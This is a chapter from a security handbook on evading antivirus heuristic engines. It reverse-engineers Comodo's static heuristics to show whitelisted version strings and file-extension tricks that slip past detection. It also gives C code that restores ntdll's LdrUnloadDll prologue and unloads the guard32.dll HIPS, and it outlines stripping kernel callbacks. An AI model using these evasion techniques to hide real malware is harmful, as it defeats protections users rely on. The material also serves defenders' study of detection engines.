The Antivirus Hacker's Handbook (2015)

Part II. Antivirus Software Evasion

Chapter 9. Evading Heuristic Engines

A common component in antivirus software that detects malicious software without relying on specialized signatures is the heuristic engine. Heuristic engines make decisions based on general evidence instead of specifics like generic detections or typical signature-based scheme counterparts.

Heuristic engines, as implemented in AV products, rely on detection routines that assess evidence and behavior. They do not rely on specific signatures to try to catch a certain family of malware or malware that shares similar properties. This chapter covers the various types of heuristic engines, which, as you will observe, may be implemented in userland, kernel-land, or both. It's important to learn how to evade heuristic engines because today antivirus products try to rely more on the behavior of the inspected applications than on the old way of detecting malwares using signatures. Learning about various heuristic engines will facilitate the process of bypassing and evading them. Similarly, the AV engineers can get some insights into how attackers are evading detection and therefore can improve the detection engine accordingly.

Heuristic Engine Types

There are three different types of heuristic engines: static, dynamic, and hybrid, which use both strategies. Most often, static heuristic engines are considered true heuristic engines, while dynamic heuristic engines are called Host Intrusion Prevention Systems (HIPS). Static heuristic engines try to discover malicious software by finding evidence statically by disassembling or analyzing the headers of the file under scrutiny. Dynamic heuristic engines try to do the same—based on the behavior of the file or program—by hooking API calls or executing the program under an emulation framework. The following sections cover these different system types and explain how they can be bypassed.

Static Heuristic Engines

Static heuristic engines are implemented in many different ways depending on the deployment target. For example, it is common to use heuristic engines that are based on machine learning algorithms, such as Bayesian networks or genetic algorithms, because they reveal information about similarities between families by focusing on the biggest malware groups created by their clustering toolkits (the heuristic engines). Those heuristic engines are better deployed in malware research labs than in a desktop product, because they can cause a large number of false positives and consume a lot of resources, which is acceptable in a lab environment. For desktop-based antivirus solutions, expert systems are a much better choice.

An expert system is a heuristic engine that implements a set of algorithms that emulate the decision-making strategy of a human analyst. A human malware analyst can determine that a Windows portable executable (PE) program appears malicious, without actually observing its behavior, by briefly analyzing the file structure and taking a quick look at the disassembly of the file. The analyst would be asking the following questions: Is the file structure uncommon? Is it using tricks to fool a human, such as changing the icon of the PE file to the icon that Windows uses for image files? Is the code obfuscated? Is the program compressed or does it seem to be protected somehow? Is it using any anti-debugging tricks? If the answer to such questions is “yes,” then a human analyst would suspect that the file is malicious or at least that it is trying to hide its logic and needs to be analyzed in more depth. Such human-like behavior, when implemented in a heuristic engine, is called an expert system.

Bypassing a Simplistic Static Heuristic Engine

This section uses the rather simplistic heuristic engine of the Comodo antivirus for Linux as an example. It is implemented in the library libHEUR.so (surprise!). Fortunately, this library comes with full debugging symbol information, so you can discover where the true heuristic engine's code is in this library by simply looking at the function names. Figure 9.1 shows a list of heuristic functions in IDA.

Screenshot of the function window of IDA displaying a list of heuristic functions.

Figure 9.1 The heuristic functions in IDA

This list shows that the C++ class CAEHeurScanner seems to be responsible for performing the heuristic scan. From the following IDA disassembly listing with the VTable of this object, it is clear that the method ScanSingleTarget is the one you are interested in if you want to bypass the heuristic engine:

.data.rel.ro:000000000021A590 ; `vtable for'CAEHeurScanner

.data.rel.ro:000000000021A590 _ZTV14CAEHeurScanner dq 0

; DATA XREF:

.got:_ZTV14CAEHeurScanner_ptr

.data.rel.ro:000000000021A598 dq offset _ZTI14CAEHeurScanner ;

`typeinfo for'CAEHeurScanner

.data.rel.ro:000000000021A5A0 dq offset

_ZN14CAEHeurScanner14QueryInterfaceER5_GUIDPPv ;

CAEHeurScanner::QueryInterface(_GUID &,void **)

.data.rel.ro:000000000021A5A8 dq offset

_ZN14CAEHeurScanner6AddRefEv ; CAEHeurScanner::AddRef(void)

.data.rel.ro:000000000021A5B0 dq offset

_ZN14CAEHeurScanner7ReleaseEv ; CAEHeurScanner::Release(void)

.data.rel.ro:000000000021A5B8 dq offset _ZN14CAEHeurScannerD1Ev

;

CAEHeurScanner::˜CAEHeurScanner()

.data.rel.ro:000000000021A5C0 dq offset _ZN14CAEHeurScannerD0Ev

; CAEHeurScanner::˜CAEHeurScanner()

.data.rel.ro:000000000021A5C8 dq offset

_ZN14CAEHeurScanner4InitEP8IUnknownPv ; CAEHeurScanner::Init(IUnknown *,

void *)

.data.rel.ro:000000000021A5D0 dq offset

_ZN14CAEHeurScanner6UnInitEPv ; CAEHeurScanner::UnInit(void *)

.data.rel.ro:000000000021A5D8 dq offset

_ZN14CAEHeurScanner12GetScannerIDEP10_SCANNERID ;

CAEHeurScanner::GetScannerID(_SCANNERID *)

.data.rel.ro:000000000021A5E0 dq offset

_ZN14CAEHeurScanner10SetSignMgrEP8IUnknown

; CAEHeurScanner::SetSignMgr(IUnknown

.data.rel.ro:000000000021A5E8 dq offset

_ZN14CAEHeurScanner16ScanSingleTargetEP7ITargetP11_SCANOPTIONP11_SCANRESULT ;

CAEHeurScanner::ScanSingleTarget(ITarget *,_SCANOPTION *,_SCANRESULT *)

.data.rel.ro:000000000021A5F0 dq offset

_ZN14CAEHeurScanner4CureEPvj ; CAEHeurScanner::Cure(void *,uint)

To start analyzing the function, you can navigate to this method in IDA. After a number of rather uninteresting calls to members of objects with unknown types, there is a call to the member ScanMultiPacked:

.text:000000000000E4F9 mov esi,

[pstScanOptions+SCANOPTION.eSHeurLevel] ; nLevel

.text:000000000000E4FD mov rcx, pstResult ; pstResult

.text:000000000000E500 mov rdx, piSrcTarget ; piTarget

.text:000000000000E503 mov rdi, this ; this

.text:000000000000E506 call

__ZN14CAEHeurScanner15ScanMultiPackedEiP7ITargetP11_SCANRESULT ;

CAEHeurScanner::ScanMultiPacked(int,ITarget *,_SCANRESULT *)

The first heuristic routine tries to determine whether the file is packed multiple times. There are a number of instructions after this call, including an interesting call to ScanUnknownPacker:

.text:000000000000E516 mov rcx, pstResult ; pstResult

.text:000000000000E519 mov rdx, pstScanOptions ;

pstScanOptions

.text:000000000000E51C mov rsi, piSrcTarget ; piSrcTarget

.text:000000000000E51F mov rdi, this ; this

.text:000000000000E522 call

__ZN14CAEHeurScanner16ScanUnknowPackerEP7ITargetP11_SCANOPTIONP11_SCANRESULT

;

CAEHeurScanner::ScanUnknowPacker(ITarget *,_SCANOPTION *,_SCANRESULT *)

It is obvious that Comodo is trying to gather more evidence, and this time it is trying to see whether the file is packed with some unknown packer. Of course, you need to know whether it is packed, and if so, how. If you continue exploring this heuristic engine, you will come across a number of instructions after this call, including this interesting call to ScanDualExtension:

.text:000000000000E530 mov rcx, pstResult ; pstScanResult

.text:000000000000E533 mov rdx, pstScanOptions ; pstScanOption

.text:000000000000E536 mov rsi, piSrcTarget ; piTarget

.text:000000000000E539 mov rdi, this ; this

.text:000000000000E53C call

__ZN14CAEHeurScanner17ScanDualExtensionEP7ITargetP11_SCANOPTIONP11_SCANRESULT

;

CAEHeurScanner::ScanDualExtension(ITarget *,_SCANOPTION *,_SCANRESULT *)

A dual extension is considered by the heuristic engine to be evidence that the file is bad without any regard for the way it is implemented. Now you can continue with the remaining calls:

.text:000000000000E557 mov rcx, pstResult ; pstScanResult

.text:000000000000E55A mov rdx, pstScanOptions

; pstScanOption

.text:000000000000E55D mov rsi, piSrcTarget

; piTarget

.text:000000000000E560 mov rdi, this ; this

.text:000000000000E563 call

__ZN14CAEHeurScanner13ScanCorruptPEEP7ITargetP11_SCANOPTIONP11_SCANRESULT

;

CAEHeurScanner::ScanCorruptPE(ITarget *,_SCANOPTION *,_SCANRESULT *)

(…)

.text:000000000000E584 mov rsi, piSrcTarget ; piTarget

.text:000000000000E587 mov rdi, this ; this

.text:000000000000E58A call

__ZN14CAEHeurScanner5IsFPsEP7ITarget ; CAEHeurScanner::IsFPs(ITarget *)

(…)

First, it checks whether the PE file appears to be corrupt by calling the ScanCorruptPE function. Then it issues a call to the function IsFPs, which tries to determine whether the “bad” file is actually a false positive. The function likely checks some sort of list of known false positives. The engine is checking a hard-coded list in the binary instead of having the list in an easy-to-update component, like the antivirus signature files. The IsFPs function is shown here:

.text:000000000000EABC ; PRBool __cdecl CAEHeurScanner::IsFPs(

CAEHeurScanner

*const this, ITarget *piTarget)

.text:000000000000EABC public

_ZN14CAEHeurScanner5IsFPsEP7ITarget

.text:000000000000EABC _ZN14CAEHeurScanner5IsFPsEP7ITarget proc near

.text:000000000000EABC

; DATA XREF:

.got.plt:off_21B160 o

.text:000000000000EABC Exit0:

.text:000000000000EABC this = rdi ; CAEHeurScanner

*const

.text:000000000000EABC piTarget = rsi ; ITarget *

.text:000000000000EABC sub rsp, 8

.text:000000000000EAC0 call

__ZN14CAEHeurScanner18IsWhiteVersionInfoEP7ITarget ;

CAEHeurScanner::IsWhiteVersionInfo(ITarget *)

.text:000000000000EAC5 test eax, eax

.text:000000000000EAC7 bRetCode = rax ; PRBool

.text:000000000000EAC7 setnz al

.text:000000000000EACA movzx eax, al

.text:000000000000EACD pop rdx

.text:000000000000EACE retn

.text:000000000000EACE _ZN14CAEHeurScanner5IsFPsEP7ITarget endp

IsFPs simply calls another member, IsWhiteVersionInfo. If you analyze this function's pseudo-code, you uncover a rather interesting algorithm:

(…)

if ( CAEHeurScanner::GetFileVer(v2, piTarget, wszVerInfo, 0x104uLL,

v2->m_hVersionDll) )

{

for ( i = 0; i < g_nWhiteVerInfoCount; ++i )

{

if ( !(unsigned int)PR_wcsicmp2(wszVerInfo,

g_WhiteVerInfo[(signed __int64)i].szVerInfo) )

return 1;

}

(…)

Note

In Windows, version information is stored in the resources directory and has a well-defined structure format. The version information usually includes file version and product version numbers, language, file description, and product name, among other version attributes.

As expected, it is checking the version information extracted from the PE header against a hard-coded list of version information from programs that are known to cause conflicts but are not malicious. The address g_WhiteVerInfo points to a list of fixed-size UTF-32 strings. If you take a look with a hexadecimal editor, you will see something like the following:

000000000021BAEE 00 00 41 00 00 00 6E 00 00 00 64 00 00 00 72 00

..A…n…d…r.

000000000021BAFE 00 00 65 00 00 00 61 00 00 00 73 00 00 00 20 00

..e…a…s… .

000000000021BB0E 00 00 48 00 00 00 61 00 00 00 75 00 00 00 73 00

..H…a…u…s.

000000000021BB1E 00 00 6C 00 00 00 61 00 00 00 64 00 00 00 65 00

..l…a…d…e.

000000000021BB2E 00 00 6E 00 00 00 00 00 00 00 00 00 00 00 00 00

..n.............

(…)

000000000021BBEE 00 00 41 00 00 00 72 00 00 00 74 00 00 00 69 00

..A…r…t…i.

000000000021BBFE 00 00 6E 00 00 00 73 00 00 00 6F 00 00 00 66 00

..n…s…o…f.

000000000021BC0E 00 00 74 00 00 00 20 00 00 00 53 00 00 00 2E 00

..t… …S.....

000000000021BC1E 00 00 41 00 00 00 2E 00 00 00 00 00 00 00 00 00

..A.............

(…)

000000000021BCEE 00 00 42 00 00 00 6F 00 00 00 62 00 00 00 53 00

..B…o…b…S.

000000000021BCFE 00 00 6F 00 00 00 66 00 00 00 74 00 00 00 00 00

..o…f…t.....

(…)

To evade this rather simplistic heuristic engine, you can use one of the UTF32-encoded strings that are white-listed, such as “Andreas Hausladen,” “ArtinSoft S.A.,” or “BobSoft,” in the malware's version information.

Now you can take a look at some of the previous heuristic routines such as ScanDualExtension:

(…)

if ( v22

&& (unsigned int)CAEHeurScanner::IsInExtensionsList(v6, v22,

g_LastExtList,

6u)

&& (unsigned int)CAEHeurScanner::IsInExtensionsList(v6, v18,

g_SecLastExtList,

0x2Fu) )

{

CSecKit::DbgStrCpyA(

&v6->m_cSecKit,

"/home/ubuntu/cavse_unix/scanners/heur/src/CAEHeurDualExtension.cpp",

111,

Scan_result->szMalwareName,

0x40uLL,

"Heur.Dual.Extensions");

Scan_result->bFound = 1;

result = 0LL;

}

else

{

LABEL_23:

result = 0x80004005LL;

}

(…)

In the pseudo-code, it is clear that it is checking whether the extensions are in the two lists: g_LastExtList and g_SecLastExtList. If they are, the Scan_result object instance is updated so that its szMalwareName member contains the detection name (Heur.Dual.Extensions) and the bFound member is set to the value 1 (true).

Now you can check both extensions lists:

.data:000000000021B8D0 ; EXTENSION_0 g_LastExtList[6]

.data:000000000021B8D0 g_LastExtList db '.EXE',0,0,0,0,0,0,'.VBS',0,0,

0,0,0,0,'.JS',0,0,0,0,0,0,0,'.CMD',0,0,0,0,0,0,'.BAT',0,0,0,0,0,0,'.'

.data:000000000021B8D0

; DATA XREF: .got:wcsExtList o

.data:000000000021B8D0 db 'SCR',0,0,0,0,0,0

.data:000000000021B90C align 10h

.data:000000000021B910 public g_SecLastExtList

.data:000000000021B910 ; EXTENSION_0 g_SecLastExtList[47]

.data:000000000021B910 g_SecLastExtList db '.ASF',0,0,0,0,0,0,'.AVI',0,0

,0,0,0,0,'.BMP',0,0,0,0,0,0,'.CAB',0,0,0,0,0,0,'.CHM',0,0,0,0,0,0,'.'

.data:000000000021B910

; DATA XREF: .got:g_SecLastExtList_ptr o

.data:000000000021B910 db 'CUR',0,0,0,0,0,0,'.DOC',0,0,0

,0,0,0,'.MSG',0,0,0,0,0,0,'.EML',0,0,0,0,0,0,'.FLA',0,0,0,0,0,0,'.'

.data:000000000021B910 db 'FON',0,0,0,0,0,0,'.GIF',0,0,0

,0,0,0,'.HLP',0,0,0,0,0,0,'.HTM',0,0,0,0,0,0,'.HTT',0,0,0,0,0,0,'.'

.data:000000000021B910 db 'ICO',0,0,0,0,0,0,'.INF',0,0,0

,0,0,0,'.INI',0,0,0,0,0,0,'.LOG',0,0,0,0,0,0,'.MID',0,0,0,0,0,0,'.'

.data:000000000021B910 db 'DOC',0,0,0,0,0,0,'.JPE',0,0,0

,0,0,0,'.JFIF',0,0,0,0,0,'.MOV',0,0,0,0,0,0,'.MP3',0,0,0,0,0,0,'.'

.data:000000000021B910 db 'MP4',0,0,0,0,0,0,'.PDF',0,0,0

,0,0,0,'.PPT',0,0,0,0,0,0,'.PNG',0,0,0,0,0,0,'.RAR',0,0,0,0,0,0,'.'

.data:000000000021B910 db 'REG',0,0,0,0,0,0,'.RM',0,0,0,

0,0,0,0,'.RMF',0,0,0,0,0,0,'.RMVB',0,0,0,0,0,'.JPEG',0,0,0,0,0,'.'

.data:000000000021B910 db 'TIF',0,0,0,0,0,0,'.IMG',0,0,0

,0,0,0,'.WMV',0,0,0,0,0,0,'.7Z',0,0,0,0,0,0,0,'.SWF',0,0,0,0,0,0,'.'

.data:000000000021B910 db 'JPG',0,0,0,0,0,0,'.TXT',0,0,0

,0,0,0,'.WAV',0,0,0,0,0,0,'.XLS',0,0,0,0,0,0,'.XLT',0,0,0,0,0,0,'.'

.data:000000000021B910 db 'XLV',0,0,0,0,0,0,'.ZIP',0,0,0

,0,0,0

As you can see, an extensions list is a set of fixed-size ASCII strings with various typical file extensions. The first list contains a number of typical executable file extensions (.EXE, .CMD, .VBS, and so on), and the second list contains a number of popular document, video, sound, or image file extensions (such as .AVI or .BMP). The two extension lists are used to see whether the filename is in the form some_name.<SecLastExt>.<LastExtList>, for example, Invoice.pdf.exe. Dual extensions of that sort—a form of attack based on social engineering principles—are common in malware that tries to fool the user into believing that an executable file is actually a video, picture, document, ZIP file, or other type. To evade this heuristic detection, you can use a single file extension, an executable extension not in the first list (such as .CPL, .HTA, or .PIF), or a second extension not in the previous list of non-executable file types (such as .JPG or .DOCX). That's all.

As shown in this section, with minimal research, you can fool and bypass expert systems-based heuristic engines.

Dynamic Heuristic Engines

Dynamic heuristic engines are implemented in the form of hooks (in userland or kernel-land) or based on emulation. The former approach is more reliable, because it involves actually looking at the true runtime behavior, while the latter is more error prone, because it largely depends on the quality of the corresponding CPU emulator engine and the quality of the emulated operating system APIs. Bypassing heuristic engines based on emulators and virtual execution environments is by far the easiest option available, as already discussed in Chapter 8. However, bypassing heuristic engines based on hooks, like the typical Host Intrusion Prevention Systems (HIPS), is not too complex and depends on which layer the API hooks are installed in. There are two options for installing hooks in order to monitor the behavior of a program: userland hooks and kernel-land hooks. Both have their advantages and disadvantages, as discussed in the following sections.

Userland Hooks

Many antivirus products use userland hooks to monitor the execution of running processes. Hooking consists of detouring a number of common APIs, such as CreateFile or CreateProcess in Windows. So, instead of executing the actual code, a monitoring code installed by the antivirus is executed first. Then, depending on a set of rules (either hard-coded or dynamic), the monitoring code blocks, allows, or reports the execution of the API. Such userland API hooks are typically installed using third-party userland hooking libraries. The following list includes the most common hooking libraries:

· madCodeHook—This is a userland-based hooking engine written in Delphi with support for many different runtime environments. This engine is used in Comodo, old versions of McAfee, and Panda antivirus solutions.

· EasyHook—This is an open-source hooking engine that is known for its good performance and completeness. Some antivirus engines are using it.

· Detours—This is a proprietary hooking engine from Microsoft Research. Its source code is available, but you must purchase a license to use it in commercial products. Some antivirus engines are using this hooking engine for implementing their Ring-3-based monitoring systems.

In any case, it is irrelevant which hooking engine is used by the antivirus you are targeting, because all userland-based hooking engines work in a very similar way:

1. They start by injecting a library into the userland processes that are subject to monitoring. Typically, the hooking library is injected into all processes, so it does system-wide monitoring of userland processes.

2. The engines resolve the API functions that the antivirus wants to monitor.

3. They replace the first assembly instructions of the function with a jump to the antivirus code for handling the corresponding API.

4. After the antivirus code hook for the API is executed and finishes its behavior-monitoring task, the hook usually passes the API call back to the original “unhooked” code path.

The antivirus hooking library or libraries can be injected using various techniques. One of the most common techniques in the past (now deprecated and no longer recommended by Microsoft) was to use the registry key AppInit_Dll. This registry key contains one or more paths to DLLs that will be injected for all userland Windows processes that import user32.dll, with a few exceptions (such as Csrss.exe). For years, this was the most typical option. It is used by Kaspersky, Panda, and a lot of other antivirus products (as well as by malware).

Another popular code injection technique, although not truly reliable, works like this: execute an antivirus program component at Windows desktop startup, inject code into an explorer.exe process via CreateRemoteThread, and hook the CreateProcessInternal function. The CreateProcessInternal function is called whenever a new process is about to be created. Because this API was hooked, it is programmed to inject the hooking DLL into the memory space of this new program. This technique cannot guarantee that all new processes will be monitored because of the limitation of the CreateRemoteThread API; nonetheless, this approach is still used by various antivirus products.

The last typical approach for injecting a DLL is to do so from kernel-land. An antivirus driver registers a PsSetCreateProcessNotifyRoutineEx callback, and for any new process, it injects, from kernel-land, a DLL with all the userland code.

Because all hooking engines work almost the same regardless of the injection technique used, you can develop universal techniques to bypass any and all userland-based hooking engines. This bypass technique relies on the fact that a hooking engine needs to overwrite the original function prologue with a jump to the antivirus replacement function, and so you can simply reverse these changes and undo the hooks.

To explain this concept clearly, it is important to note that the prologue of most frame-based functions has the same byte code sequence or machine instructions, typically the following:

8BFF mov edi,edi

55 push ebp

8BEC mov ebp,esp

One quick way to undo the hook is to hard-code the byte sequence of the function prologue in your evasion code and then overwrite the function's start with this prologue. This approach may fail if the hooked functions have a different prologue. Here is a better way to undo the API hook:

1. Read the original libraries from disk (that is, the code of kernel32.dll or ntdll.dll).

2. Resolve the hooked functions' addresses in the library. This can be done, for example, using the Microsoft library dbgeng.dll or by manually walking the export table of the DLL to figure out the addresses.

3. Read the initial bytes of these functions.

4. Write the original bytes back into memory. The antivirus may notice the patch. An alternative would be to execute the first instructions read from the file and then jump back to the original code.

The next section demonstrates an even easier method for bypassing such heuristic engines.

Note

Bypassing userland hooks used by heuristic engines can be even easier than the generic solution just discussed. Userland hooks can be implemented at various levels. For example, you can hook the CreateFileA andCreateFileW functions from kernel32.dll, or you can hook NtOpenFile from ntdll.dll. The lowest userland level is ntdll.dll; however, in many cases, antivirus products hook only the highest-level functions exported byadvapi32.dll or kernel32.dll. In such cases, you do not need to patch the memory of the loaded libraries to remove the hooks; you simply need to use the ntdll.dll exported API (also called a native API), and the antivirus hooking engine will be oblivious to your actions.

Bypassing a Userland HIPS

Comodo Internet Security version 8 and earlier had one HIPS and a sandbox. The HIPS was, naturally, a heuristic engine. The sandbox was a kernel-land component but the HIPS was not. The HIPS was completely developed as userland components. It was implemented in the library guard32.dll or guard64.dll (depending on the architecture and the program executed), which was injected in all userland processes. Note that if those DLLs were not ASLR (Address Space Layout Randomization) aware, then they would render the operating system's ASLR ineffective on a system-wide level for all userland components of the machine being “protected.” Once again, I discuss the implications of injecting non-ASLR DLLs in processes. At one point, Comodo was making the mistake of injecting a non-ASLR version of its hooks, as shown in Figure 9.2.

Image described by caption and surrounding text.

Figure 9.2 The Comodo HIPS engine without ASLR injected into Firefox

The Comodo guard32 and guard64 libraries hook userland functions such as the exported functions kernel32!CreateProcess[A|W], kernel32!CreateFile[A|W], and ntdll!drUnloadDll. One quick and easy way to avoid being detected is to disable this HIPS heuristic engine by unloading the hook library (guard32.dll for 32-bit processes and guard64.dll for 64-bit processes) immediately after your evasion code runs.

On my first try, I simply created a utility with the following code:

int unhook(void)

{

return FreeLibrary(GetModuleHandleA("guard32.dll"));

}

However, it did not work. The function unhook always returned the error 5, “Access denied.” After attaching a debugger to my userland process, I discovered that the function FreeLibrary was hooked by the guard module—not at kernel32 level (FreeLibrary is exported by this library) but rather at ntdll.dll level, by hooking the function LdrUnloadDll. What can you do to unload the HIPS engine from the process? You can simply remove the hook from LdrUnloadDll and then call the previous code, as shown in the following code:

HMODULE hlib = GetModuleHandleA("guard32.dll");

if ( hlib != INVALID_HANDLE_VALUE )

{

void *addr = GetProcAddress(GetModuleHandleA("ntdll.dll"),

"LdrUnloadDll");

if ( addr != NULL )

{

DWORD old_prot;

if ( VirtualProtect(addr, 16, PAGE_EXECUTE_READWRITE,

&old_prot) != 0 )

{

// Bytes hard-coded from the original Windows 7 x32

// ntdll.dll library

char *patch = "\x6A\x14\x68\xD8\xBC\xE9\x7D\xE8\x51\xCC"

"\xFE\xFF\x83\x65\xE0\x00";

memcpy(addr, patch, sizeof(patch));

VirtualProtect(addr, 16, old_prot, &old_prot);

}

if ( FreeLibrary(hlib) )

MessageBoxA(0, "Magic done", "MAGIC", 0);

}

To follow this easy example, you just patch back the entry point of the ntdll.dll exported function LdrUnloadDll and then call FreeLibrary with the handle of the guard32.dll library. It is as simple as it sounds. Actually, this technique has been used a number of times to bypass other HIPS; the first time I remember somebody writing about this approach was in Phrack, Volume 0x0b, Issue 0x3e, from 2003/2004, which is available at http://grugq.github.io/docs/phrack-62-05.txt.

As “The Grugq” (one of the original authors of that issue of Phrack), said in Twitter after rediscovering techniques that he used roughly ten years before, “User-land sand boxing cannot work. If you're in the same address space as the malware, malware wins. End of story.” And he is absolutely right.

Kernel-Land Hooks

You saw in the previous section that bypassing userland hooks (which most userland-based heuristic engines are derived from) is an easy task. But what about kernel-land hooks? How are they usually implemented? How can you bypass them? Hooking in kernel-land can be done at almost any layer. An antivirus product may hook process or thread creation at kernel level by registering callbacks to the following functions:

· PsSetCreateProcessNotifyRoutine—Adds or removes an element from the list of routines to be called whenever a process is created or deleted.

· PsSetCreateThreadNotifyRoutine—Registers a driver-supplied callback that is subsequently notified when a new thread is created or deleted.

· PsSetLoadImageNotifyRoutine—Registers a driver-supplied callback that is subsequently notified whenever an image is loaded or mapped into memory.

These functions are implemented in kernel-drivers, not only for creating heuristic engines but also to analyze programs before they are executed or loaded. From a userland program, unlike with the previous hooking engines, there is no way of bypassing or even getting information about the installed callbacks. However, a malware program running at kernel level can. I will illustrate with a typical example:

1. The malware installs a driver or abuses a kernel-level vulnerability to run its code at Ring-0.

The malware gets a pointer to the (undocumented) PspCreateProcessNotifyRoutine.

2. Then, the malware removes all registered callbacks for this routine.

3. The true malicious programs, which are not being monitored, are executed.

However, first the program needs to execute code at kernel level; otherwise, it would be unable to remove any of the registered callbacks. An example of removing kernel callbacks is illustrated by this blog post by Daniel Pistelli: http://rcecafe.net/?p=116http://rcecafe.net/?p=116.

At kernel level, there are more hooks, or callbacks, that can be registered to monitor anything the computer is doing. These hooks are typically used in kernel-level heuristic engines. It is common to see filesystem and registry hooks monitoring (as well as denying or allowing, depending on a set of rules that can be either hard-coded or dynamic) what is happening in the filesystem or registry. This is often done using mini-filters for filesystems. A mini-filter is a kernel-mode driver that exposes functionality that can be used to monitor and log any I/O and transaction activity that occurs in the system. It can, for example, examine files before they are actually opened, written to, or read from. Again, from a userland process, there is nothing malware can do; however, from a kernel-land driver, malware can do its work in a level lower than PASSIVE_LEVEL (where the mini-filter will work), such as in APC_LEVEL (asynchronous procedure calls) or DISPATCH_LEVEL (where deferred procedure calls happen), and even at lower levels.

Returning to hooking registry activity, antivirus software can register a registry callback routine via CmRegisterCallback. The RegistryCallback routine receives notifications of each registry operation before the configuration manager processes the operation. Yet again, there is nothing a userland program can do from user-space to detect and bypass callbacks at kernel level; it will need kernel-level execution in order to do so. A malware or any kernel-level program can remove the callbacks, as explained in the case of thePsSetCreateProcessNotifyRoutine, and then continue afterwards to do whatever it wants with the registry without being intercepted by an antivirus kernel-driver (see Figure 9.3).

Table presenting a list of IRQLs, with five columns, from left to right, labeled IRQL, X86 IRQL Value, AMD64 IRQL Value, IA64 IRQL Value, and Description, respectively.

Figure 9.3 List of IRQLs

Summary

This chapter covered the various types of heuristic engines that may be implemented in userland, kernel-land, or both. For each type of heuristic engine, this chapter also covered various methods on how to bypass these heuristic-based detections.

In summary, the following topics were covered:

· Heuristic engines, as implemented in AV products, rely on detection routines that assess evidence and behavior as collected from analyzing the code in question statically or dynamically.

· Static heuristic engines try to discover malicious software by finding evidence statically by disassembling or analyzing the headers of the file under scrutiny. It is common to use heuristic engines that are based on machine learning algorithms, such as Bayesian networks, genetic algorithms, or expert systems.Most often, static heuristic engines are considered true heuristic engines, while dynamic heuristic engines are called Host Intrusion Prevention Systems (HIPS).

· Heuristic engines based on expert systems implement a set of algorithms that emulate the decision-making strategy of a human analyst.

· Dynamic heuristic engines also base their detections on the behavior of the file or program by hooking API calls or executing the program under an emulation framework.

· Dynamic heuristic engines are implemented in the form of hooks (in userland or kernel-land). They could also be based on emulation (in the case of static analysis).

· Dynamic heuristic engines using userland hooks work by detouring some APIs to monitor the execution of those APIs and block them if needed. These userland hooks are usually implemented with the help of third-party hooking libraries such as EasyHooks, Microsoft's Detours, or madCodeHook, among others.

· Bypassing userland hooks is easy in many ways. For instance, attackers could read the original prologue of the hooked functions from the disk, execute those bytes, then continue executing the part of the function past the prologue bytes (which are not hooked). Another simple approach is to unload the hooking library, which, in turn, will remove the hooks as it unloads.

· Kernel-land-based hooks rely on registering callbacks that monitor the creation of processes and access to the system registry. They also employ filesystem filter drivers for real-time file activity monitoring.

· Similarly to bypassing userland hooks, kernel-land hooks can be uninstalled by malicious code running in the kernel.

· The third type of heuristic engines is implemented by using both user-land and kernel-land hooks.

This chapter concludes this part of the book and paves way for the next part that will talk about attacking the antivirus software as a whole by identifying the attack vectors (local or remote attack vectors) and then finding bugs and exploiting them.